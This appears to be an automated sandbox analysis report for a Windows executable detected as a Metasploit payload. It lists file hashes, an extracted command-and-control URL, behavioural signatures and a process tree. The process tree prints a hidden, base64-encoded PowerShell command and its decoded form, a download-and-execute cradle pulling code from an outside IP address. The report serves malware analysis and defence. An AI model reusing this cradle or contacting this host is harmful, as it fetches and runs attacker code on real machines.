Analysis
-
max time kernel
93s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
08-07-2022 20:02
Static task
static1
Behavioral task
behavioral1
Sample
c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
Resource
win10v2004-20220414-en
General
-
Target
c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe
-
Size
28KB
-
MD5
2604e69479154e5d7ddc00115706ef0f
-
SHA1
66c3a2ca32c785a3e3850354388e9259b5a8feb4
-
SHA256
c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63
-
SHA512
9d6a4d5bf57d24375e991092575ce4fcc7ffa6302adf72ff584abbc3de9d4a7b14be7cfdedfc7d2f5adf41d2268f4e8744b7d02a5eb59efda5a47d6665dea3d6
Malware Config
Extracted
http://45.32.16.170:80/a
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 33 4408 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1560 powershell.exe 1560 powershell.exe 4408 powershell.exe 4408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exepowershell.exedescription pid process target process PID 4768 wrote to memory of 1560 4768 c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe powershell.exe PID 4768 wrote to memory of 1560 4768 c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe powershell.exe PID 4768 wrote to memory of 1560 4768 c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe powershell.exe PID 1560 wrote to memory of 4408 1560 powershell.exe powershell.exe PID 1560 wrote to memory of 4408 1560 powershell.exe powershell.exe PID 1560 wrote to memory of 4408 1560 powershell.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe"C:\Users\Admin\AppData\Local\Temp\c8812a4a2b7608578dbe76214fc1cd29b641eb3051fa3b4e61d4c23af7e88c63.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEANgAuADEANwAwADoAOAAwAC8AYQAnACkAKQAiAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://45.32.16.170:80/a'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD56195a91754effb4df74dbc72cdf4f7a6
SHA1aba262f5726c6d77659fe0d3195e36a85046b427
SHA2563254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD58d19b0dcdb54679f4470f3c2b6ffb7ad
SHA13f10a4163430fc7af30b7c57a1b89315f88ea479
SHA256bafea111054a0004cbf26afac12e150ca52d34c6a0957f4997c4d68e97d31b1b
SHA5127844e974592f18af89d15c2281b5f187cd638bca373edf4b8af68182885e24d96612ecb9cbc1e295a84f9816f22896c5185271beefcb9054c9af50baf2e4c68c
-
memory/1560-136-0x0000000004E70000-0x0000000004ED6000-memory.dmpFilesize
408KB
-
memory/1560-133-0x0000000004F90000-0x00000000055B8000-memory.dmpFilesize
6.2MB
-
memory/1560-134-0x0000000004C30000-0x0000000004C52000-memory.dmpFilesize
136KB
-
memory/1560-135-0x0000000004D50000-0x0000000004DB6000-memory.dmpFilesize
408KB
-
memory/1560-137-0x0000000004F70000-0x0000000004F8E000-memory.dmpFilesize
120KB
-
memory/1560-132-0x0000000002710000-0x0000000002746000-memory.dmpFilesize
216KB
-
memory/1560-131-0x0000000000000000-mapping.dmp
-
memory/4408-138-0x0000000000000000-mapping.dmp
-
memory/4408-139-0x0000000008110000-0x000000000878A000-memory.dmpFilesize
6.5MB
-
memory/4408-140-0x0000000006CB0000-0x0000000006CCA000-memory.dmpFilesize
104KB
-
memory/4768-130-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4768-143-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB